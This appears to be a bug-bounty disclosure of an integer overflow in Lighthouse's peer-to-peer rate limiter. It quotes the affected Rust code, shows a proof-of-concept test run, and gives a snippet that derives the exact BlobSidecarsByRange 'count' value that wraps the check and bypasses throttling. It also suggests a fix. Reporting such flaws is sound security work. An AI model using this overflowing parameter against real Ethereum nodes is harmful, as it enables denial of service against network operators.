Increasing greater than or equal to 25% of network processing node resource consumption by at least 30% without brute force actions, compared to the preceding 24 hours
Description
Brief/Intro
The issue is very similar to #38920, which I submitted earlier.
Lighthouse's internal rate limiter is vulnerable to an integer overflow.
A remote attacker can bypass the rate-limit checks and trigger a potential Denial of Service.
Vulnerability Details
The BlobSidecarsByRange p2p request https://github.com/ethereum/consensus-specs/blob/dev/specs/deneb/p2p-interface.md?ref=bankless.ghost.io#blobsidecarsbyrange-v1 has two parameters: start_slot and count.
To prevent potential Denial of Service issues, Lighthouse has an internal rate limiter.
If the 'count' value is too high, the rate limiter returns an error and the request is not processed.
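For reference, here is a simplified sketch of how the request type looks in Lighthouse (the field names follow the spec; the exact definition in beacon_node/lighthouse_network/src/rpc/methods.rs may differ slightly):
// Simplified sketch, not copied verbatim from the Lighthouse sources.
pub struct BlobsByRangeRequest {
    /// The starting slot of the requested range.
    pub start_slot: u64,
    /// The number of slots to return blob sidecars for; this value is attacker-controlled.
    pub count: u64,
}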
Let's look at the code https://github.com/sigp/lighthouse/blob/stable/beacon_node/lighthouse_network/src/rpc/mod.rs#L396
fn on_connection_handler_event(
&mut self,
peer_id: PeerId,
conn_id: ConnectionId,
event: <Self::ConnectionHandler as ConnectionHandler>::ToBehaviour,
) {
match event {
HandlerEvent::Ok(RPCReceived::Request(Request {
id,
substream_id,
r#type,
})) => {
if let Some(limiter) = self.limiter.as_mut() {
// check if the request is conformant to the quota
1) match limiter.allows(&peer_id, &r#type) {
Err(RateLimitedErr::TooLarge) => {
// we set the batch sizes, so this is a coding/config err for most protocols
let protocol = r#type.versioned_protocol().protocol();
if matches!(
protocol,
Protocol::BlocksByRange
| Protocol::BlobsByRange
| Protocol::DataColumnsByRange
| Protocol::BlocksByRoot
| Protocol::BlobsByRoot
| Protocol::DataColumnsByRoot
) {
debug!(self.log, "Request too large to process"; "request" => %r#type, "protocol" => %protocol);
} else {
// Other protocols shouldn't be sending large messages, we should flag the peer kind
crit!(self.log, "Request size too large to ever be processed"; "protocol" => %protocol);
}
// send an error code to the peer.
// the handler upon receiving the error code will send it back to the behaviour
...
return;
}
Err(RateLimitedErr::TooSoon(wait_time)) => {
debug!(self.log, "Request exceeds the rate limit";
"request" => %r#type, "peer_id" => %peer_id, "wait_time_ms" => wait_time.as_millis());
// send an error code to the peer.
// the handler upon receiving the error code will send it back to the behaviour
...
return;
}
// No rate limiting, continue.
Ok(()) => {}
}
}
...
}
The rate limiter is called at the line marked 1). Let's look at the actual implementation: https://github.com/sigp/lighthouse/blob/stable/beacon_node/lighthouse_network/src/rpc/rate_limiter.rs
pub fn allows<Item: RateLimiterItem>(
&mut self,
peer_id: &PeerId,
request: &Item,
) -> Result<(), RateLimitedErr> {
let time_since_start = self.init_time.elapsed();
1) let tokens = request.max_responses().max(1);
let check =
|limiter: &mut Limiter<PeerId>| limiter.allows(time_since_start, peer_id, tokens);
...
}
pub fn allows(
&mut self,
time_since_start: Duration,
key: &Key,
tokens: u64,
) -> Result<(), RateLimitedErr> {
let time_since_start = time_since_start.as_nanos() as u64;
let tau = self.tau;
let t = self.t;
// how long does it take to replenish these tokens
2) let additional_time = t * tokens;
3) if additional_time > tau {
// the time required to process this amount of tokens is longer than the time that
// makes the bucket full. So, this batch can _never_ be processed
return Err(RateLimitedErr::TooLarge);
}
// If the key is new, we consider their bucket full (which means, their request will be
// allowed)
let tat = self
.tat_per_key
.entry(key.clone())
.or_insert(time_since_start);
// check how soon could the request be made
let earliest_time = (*tat + additional_time).saturating_sub(tau);
// earliest_time is in the future
if time_since_start < earliest_time {
Err(RateLimitedErr::TooSoon(Duration::from_nanos(
/* time they need to wait, i.e. how soon were they */
earliest_time - time_since_start,
)))
} else {
// calculate the new TAT
*tat = time_since_start.max(*tat) + additional_time;
Ok(())
}
}
pub fn max_responses(&self) -> u64 {
match self {
RequestType::BlobsByRange(req) => req.max_blobs_requested::<E>(),
}
}
impl BlobsByRangeRequest {
pub fn max_blobs_requested<E: EthSpec>(&self) -> u64 {
self.count.saturating_mul(E::max_blobs_per_block() as u64)
}
}
The value of the 'tokens' variable equals req.max_blobs_requested(),
which is 'count' multiplied by 6 (the maximum number of blobs per block according to the spec).
If 'tokens' is large enough, an integer overflow occurs at the line marked 2), where additional_time = t * tokens is computed.
'additional_time' is the estimated time needed to replenish the tokens for this request; when the multiplication wraps around to a small value, the "too large" check marked 3) does not trigger.
As a result, the rate limiter returns Ok(()) and the request is processed by Lighthouse.
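To illustrate the wrap-around, here is a minimal standalone sketch using the t and tau values printed by the PoC below (19531250 ns per token and a 10-second bucket); the constants are taken from the test output, not measured on a live node:
fn main() {
    let t: u64 = 19_531_250;           // ns needed to replenish one token (from the PoC output)
    let tau: u64 = 10_000_000_000;     // bucket capacity in ns (from the PoC output)
    let tokens: u64 = 944_473_296_576; // max_blobs_requested() for count = 0x24a67fcd20

    // The vulnerable line computes `t * tokens` directly; in a release build the
    // multiplication wraps around 2^64 instead of panicking.
    let additional_time = t.wrapping_mul(tokens);
    println!("additional_time = {additional_time}");                 // prints 40448384
    println!("TooLarge check triggers: {}", additional_time > tau);  // prints false
}
A checked_mul (or saturating_mul) at that point would make the request fall into the TooLarge branch instead of silently wrapping.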
Impact Details
Potential Denial of Service: an attacker can request a very large number of blobs from a Lighthouse node.
The space occupied by stored blobs is estimated at around 50 GB - https://lighthouse-book.sigmaprime.io/advanced-blobs.html
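As a rough upper bound (my own estimate, assuming the Deneb mainnet parameters of 6 blobs per block, 131072-byte blobs, and a minimum retention window of 4096 epochs of 32 slots), a single unthrottled BlobSidecarsByRange request can cover the node's entire blob store:
fn main() {
    let slots_retained: u64 = 4096 * 32;     // MIN_EPOCHS_FOR_BLOB_SIDECARS_REQUESTS * slots per epoch
    let max_blobs: u64 = slots_retained * 6; // up to 786_432 blob sidecars within the retention window
    let bytes: u64 = max_blobs * 131_072;    // ~96 GiB theoretical maximum (~50 GB in practice)
    println!("worst-case blob data servable per request: {bytes} bytes");
}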
Proof of Concept
$ cd lighthouse/beacon_node/lighthouse_network/src/rpc
$ cargo test -r test_next_peer_request_ready -- --nocapture
You should see output like this:
running 1 test
XXXXKE testing rate limit with count 0x4142...
XXXXKE allows tokens 1603800 maxresp 1603800 proto blob_sidecars_by_range
XXXXKE allows2 t 19531250, tokens 1603800 add_time 31324218750000 vs tau 10000000000
XXXXKE rate limit error - too large!
XXXXKE testing rate limit with count 0x24a67fcd20...
XXXXKE allows tokens 944473296576 maxresp 944473296576 proto blob_sidecars_by_range
XXXXKE allows2 t 19531250, tokens 944473296576 add_time 40448384 vs tau 10000000000
XXXKE rate limit is OK
test rpc::self_limiter::tests::test_next_peer_request_ready ... ok
In the first run, the rate limiter is tested with a large count value (0x4142) and it correctly signals an error (TooLarge).
In the second run, the count (0x24a67fcd20) causes the integer overflow and the rate-limit check passes.
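For completeness, here is a small sketch of how such a count can be derived offline, assuming the same t = 19531250 ns per token and 6 blobs per block as in the output above; it reproduces the 0x24a67fcd20 value used in the second run:
fn main() {
    let t: u64 = 19_531_250;       // ns per token, as printed by the test
    let tau: u64 = 10_000_000_000; // bucket capacity in ns
    let blobs_per_block: u64 = 6;

    // Smallest count whose token cost pushes t * tokens just past 2^64,
    // so that the wrapped product lands far below tau.
    let count = (u128::from(u64::MAX) / u128::from(t * blobs_per_block)) as u64 + 1;
    let tokens = count * blobs_per_block;
    let wrapped = t.wrapping_mul(tokens);

    println!("count  = {count:#x}");   // 0x24a67fcd20
    println!("tokens = {tokens}");     // 944473296576
    println!("wrapped additional_time = {wrapped}, tau = {tau}"); // 40448384 < tau
}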